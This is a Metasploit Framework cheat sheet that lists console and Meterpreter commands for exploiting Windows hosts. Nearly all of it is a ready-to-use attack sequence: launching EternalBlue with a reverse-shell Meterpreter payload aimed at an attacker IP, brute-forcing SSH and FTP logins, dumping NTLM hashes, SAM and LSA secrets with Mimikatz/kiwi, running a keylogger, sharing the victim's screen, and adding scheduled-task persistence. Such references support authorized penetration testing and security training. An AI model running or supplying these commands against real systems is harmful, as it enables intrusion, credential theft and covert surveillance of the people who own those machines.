Metasploit Framework — Exploitation

Metasploit Framework — the world's most used penetration testing framework for exploit development and execution.

Apr 2026, lazyhackers
msfconsole Basics (15)
msfconsole
Launch Metasploit console
start
msfconsole -q
Launch quietly (no banner)
start
msfdb init && msfconsole
Initialize database then launch
start db
search type:exploit platform:windows smb
Search for Windows SMB exploits
search
search cve:2017-0144
Search by CVE number
search cve
use exploit/windows/smb/ms17_010_eternalblue
Select EternalBlue exploit
use smb
info
Show info about selected module
info
show options
Show required options for module
options
show payloads
List compatible payloads
payloads
set RHOSTS 10.10.10.1
Set target host
options
set LHOST 10.10.14.1
Set attacker IP (for reverse shells)
options
set LPORT 4444
Set listener port
options
set payload windows/x64/meterpreter/reverse_tcp
Set Meterpreter payload
payload meterpreter
run
Execute the exploit
run
check
Check if target is vulnerable (non-intrusive)
check
Meterpreter Commands (19)
sysinfo
Get system information
meterpreter info
getuid
Get current user
meterpreter priv
getpid
Get current process ID
meterpreter
ps
List running processes
meterpreter process
migrate 1234
Migrate to process ID 1234
meterpreter process migrate
shell
Drop to OS shell
meterpreter shell
upload /local/file.exe C:\\Windows\\Temp\\file.exe
Upload file to target
meterpreter file
download C:\\Windows\\System32\\sam /tmp/
Download file from target
meterpreter file
hashdump
Dump local NTLM password hashes
meterpreter creds hashes
getsystem
Attempt privilege escalation to SYSTEM
meterpreter privesc
run post/windows/gather/smart_hashdump
Smart hashdump post module
meterpreter post hashes
run post/multi/recon/local_exploit_suggester
Find local privilege escalation exploits
meterpreter privesc
background
Background current session
meterpreter session
sessions -l
List all active sessions
sessions
sessions -i 1
Interact with session 1
sessions
keyscan_start && keyscan_dump
Start/dump keylogger
meterpreter keylog
screenshare
Live screen sharing from target
meterpreter screen
portfwd add -l 3389 -p 3389 -r 192.168.1.10
Port forward RDP through Meterpreter
meterpreter portfwd rdp
run post/windows/manage/enable_rdp
Enable RDP on Windows target
meterpreter rdp post
Auxiliary Modules (7)
use auxiliary/scanner/portscan/tcp
TCP port scanner
auxiliary portscan
use auxiliary/scanner/smb/smb_ms17_010
Scan for EternalBlue vulnerability
auxiliary smb scan
use auxiliary/scanner/ssh/ssh_login
SSH brute force login
auxiliary ssh bruteforce
use auxiliary/scanner/http/dir_scanner
HTTP directory scanner
auxiliary http dirs
use auxiliary/scanner/vnc/vnc_none_auth
Find VNC with no auth required
auxiliary vnc
use auxiliary/scanner/ftp/ftp_login
FTP brute force
auxiliary ftp bruteforce
use auxiliary/server/capture/http_ntlm
Capture NTLM hashes over HTTP
auxiliary capture ntlm
Post-Exploitation & Persistence (7)
run post/windows/gather/credentials/credential_collector
Collect all credentials on Windows
post creds
run post/multi/gather/env
Collect environment variables
post env
run post/windows/manage/persistence_exe STARTUP=SCHEDULER
Add persistence via scheduled task
post persistence
load kiwi
Load Mimikatz (kiwi) extension
meterpreter mimikatz kiwi
creds_all
Dump all credentials via kiwi
meterpreter kiwi creds
lsa_dump_sam
Dump SAM database via kiwi
meterpreter kiwi sam
lsa_dump_secrets
Dump LSA secrets via kiwi
meterpreter kiwi lsa